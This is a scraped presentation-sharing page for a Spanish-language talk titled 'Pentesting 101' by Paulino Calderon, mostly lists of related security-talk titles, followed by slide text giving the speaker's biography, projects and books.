Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
RootedCON
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
Websec México, S.C.
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
RootedCON
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
RootedCON
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
RootedCON
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
Tensor
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Introducción al pentesting free security
Introducción al pentesting   free securityIntroducción al pentesting   free security
Introducción al pentesting free security
Antonio Toriz
 
Nmap para auditoría de redes en Linux
Nmap para auditoría de redes en LinuxNmap para auditoría de redes en Linux
Nmap para auditoría de redes en Linux
Andres Giovanni Lara Collazos
 
Hardware para hacking (2011)
Hardware para hacking (2011)Hardware para hacking (2011)
Hardware para hacking (2011)
Websec México, S.C.
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
Jaime Sánchez
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
RootedCON
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
RootedCON
 

La actualidad más candente (20)

Pruebas de penetración nmap
Pruebas de penetración nmapPruebas de penetración nmap
Pruebas de penetración nmap
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
 
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Introducción al pentesting free security
Introducción al pentesting   free securityIntroducción al pentesting   free security
Introducción al pentesting free security
 
Nmap para auditoría de redes en Linux
Nmap para auditoría de redes en LinuxNmap para auditoría de redes en Linux
Nmap para auditoría de redes en Linux
 
Hardware para hacking (2011)
Hardware para hacking (2011)Hardware para hacking (2011)
Hardware para hacking (2011)
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
 

Similar a Pentesting 101 por Paulino Calderon

Curso Virtual de Nmap
Curso Virtual de NmapCurso Virtual de Nmap
Curso Virtual de Nmap
Alonso Caballero
 
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetTecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
Javier Junquera
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
Iván Portillo
 
Snortpracticas 2006
Snortpracticas 2006Snortpracticas 2006
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0wcuestas
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
Marc Pàmpols
 
S7 hack-hacking con google bing y shodan p3
S7 hack-hacking con google bing y shodan p3S7 hack-hacking con google bing y shodan p3
S7 hack-hacking con google bing y shodan p3
Luis Fernando Aguas Bucheli
 
Network.Penetration.CGSOL
Network.Penetration.CGSOLNetwork.Penetration.CGSOL
Network.Penetration.CGSOL
ykro
 
Curso Virtual de Nmap 2019
Curso Virtual de Nmap 2019Curso Virtual de Nmap 2019
Curso Virtual de Nmap 2019
Alonso Caballero
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Alejandro Ramos
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
S7-Hack-Hacking con Google Bing y Shodan P3
S7-Hack-Hacking con Google Bing y Shodan P3S7-Hack-Hacking con Google Bing y Shodan P3
S7-Hack-Hacking con Google Bing y Shodan P3
Luis Fernando Aguas Bucheli
 
106189646-deteccion-de-equipos-y-puertos
 106189646-deteccion-de-equipos-y-puertos 106189646-deteccion-de-equipos-y-puertos
106189646-deteccion-de-equipos-y-puertosxavazquez
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
Internet Security Auditors
 
Labs
LabsLabs
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
Mauricio Velazco
 
Hacking etico
Hacking eticoHacking etico
Hacking etico
David Thomas
 

Similar a Pentesting 101 por Paulino Calderon (20)

Curso Virtual de Nmap
Curso Virtual de NmapCurso Virtual de Nmap
Curso Virtual de Nmap
 
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetTecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
 
Snortpracticas 2006
Snortpracticas 2006Snortpracticas 2006
Snortpracticas 2006
 
3.redes seguridad
3.redes seguridad3.redes seguridad
3.redes seguridad
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
S7 hack-hacking con google bing y shodan p3
S7 hack-hacking con google bing y shodan p3S7 hack-hacking con google bing y shodan p3
S7 hack-hacking con google bing y shodan p3
 
Network.Penetration.CGSOL
Network.Penetration.CGSOLNetwork.Penetration.CGSOL
Network.Penetration.CGSOL
 
Curso Virtual de Nmap 2019
Curso Virtual de Nmap 2019Curso Virtual de Nmap 2019
Curso Virtual de Nmap 2019
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
 
Pucela testingdays testing_en_php
Pucela testingdays testing_en_phpPucela testingdays testing_en_php
Pucela testingdays testing_en_php
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
S7-Hack-Hacking con Google Bing y Shodan P3
S7-Hack-Hacking con Google Bing y Shodan P3S7-Hack-Hacking con Google Bing y Shodan P3
S7-Hack-Hacking con Google Bing y Shodan P3
 
106189646-deteccion-de-equipos-y-puertos
 106189646-deteccion-de-equipos-y-puertos 106189646-deteccion-de-equipos-y-puertos
106189646-deteccion-de-equipos-y-puertos
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
 
Labs
LabsLabs
Labs
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
 
Hacking etico
Hacking eticoHacking etico
Hacking etico
 

Más de Websec México, S.C.

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]
Websec México, S.C.
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Websec México, S.C.
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of Code
Websec México, S.C.
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
Websec México, S.C.
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
Websec México, S.C.
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon Pale
Websec México, S.C.
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino Calderon
Websec México, S.C.
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis Colunga
Websec México, S.C.
 
OSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickopsOSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickops
Websec México, S.C.
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk
Websec México, S.C.
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel Beltran
Websec México, S.C.
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
Websec México, S.C.
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
Websec México, S.C.
 
Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)
Websec México, S.C.
 
Mac2wepkey (2011)
Mac2wepkey (2011)Mac2wepkey (2011)
Mac2wepkey (2011)
Websec México, S.C.
 
Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)
Websec México, S.C.
 
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Websec México, S.C.
 
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Websec México, S.C.
 
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Websec México, S.C.
 

Más de Websec México, S.C. (19)

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of Code
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon Pale
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino Calderon
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis Colunga
 
OSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickopsOSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickops
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel Beltran
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
 
Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)
 
Mac2wepkey (2011)
Mac2wepkey (2011)Mac2wepkey (2011)
Mac2wepkey (2011)
 
Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)
 
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
 
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
 
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
 

Último

Clases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicosClases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicos
mcavero2019
 
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASAEXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
Javier Lasa
 
ayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupalayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupal
jesusmedina766305
 
fase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptxfase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptx
QuerubinOlayamedina
 
Presentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivoPresentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivo
juanlemus11122
 
Los derechos de autor y Ética Profesional
Los derechos de autor y Ética ProfesionalLos derechos de autor y Ética Profesional
Los derechos de autor y Ética Profesional
bgonzalezm20
 
WordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPressWordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPress
Fernando Tellado
 
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.docSistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
LuisEnriqueCarboneDe
 
blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....
JosvilAngel
 
EduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptxEduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptx
Elizabeth Mejia
 
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIOFISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
DarwinNestorArapaQui
 
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_  conceptos b-sicos de programaci-n.pdfEstructuras b-sicas_  conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
edepjuanorozco
 
estrategias de aprendizaje con ejemplos
estrategias de aprendizaje  con ejemplosestrategias de aprendizaje  con ejemplos
estrategias de aprendizaje con ejemplos
MarilinPaladines
 

Último (13)

Clases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicosClases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicos
 
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASAEXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
 
ayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupalayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupal
 
fase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptxfase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptx
 
Presentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivoPresentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivo
 
Los derechos de autor y Ética Profesional
Los derechos de autor y Ética ProfesionalLos derechos de autor y Ética Profesional
Los derechos de autor y Ética Profesional
 
WordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPressWordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPress
 
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.docSistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
 
blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....
 
EduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptxEduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptx
 
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIOFISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
 
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_  conceptos b-sicos de programaci-n.pdfEstructuras b-sicas_  conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
 
estrategias de aprendizaje con ejemplos
estrategias de aprendizaje  con ejemplosestrategias de aprendizaje  con ejemplos
estrategias de aprendizaje con ejemplos
 

Pentesting 101 por Paulino Calderon

  • 1.
  • 2. ● Soy fundador/Consultor de Websec México: http://websec.mx ● Fuí parte del programa Google Summer Of Code 2011: https://code.google.com/p/google-summer-of-code-2011-nmap/ ● Soy desarrollador NSE del proyecto Nmap: http://nmap.org ● He contribuido con módulos oficiales del proyecto Metasploit: http://www.rapid7.com/db/search?q=paulino+calderon #cat /etc/about Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 3. ● He desarrollado algunas apps de Android: ○ Mac2wepkey HHG5XX (+5 millones de descargas) https://play.google.com/store/apps/details?id=mx.websec. mac2wepkey.hhg5xx ○ IP2hosts (+5 mil descargas) https://play.google.com/store/apps/details?id=websec.ip2hosts ○ Vecinitum de fibra (+10 mil descargas) https://play.google.com/store/apps/details?id=mx.websec. mac2wepkey.al #cat /etc/about Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 4. Y he escrito un par de libros: ○ Nmap 6: Network Exploration and Security Auditing Cookbook (5 estrellas en Amazon) http://www.amazon.com/Nmap-exploration-security-auditing- ebook/dp/B00AC1HF8W/ ○ Mastering the Nmap Scripting Engine (Nov 2014) http://www.amazon.com/Mastering-Scripting-Engine-Paulino- Calderon/dp/1782168311/ Entre otras cosas: http://calderonpale.com #cat /etc/about Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
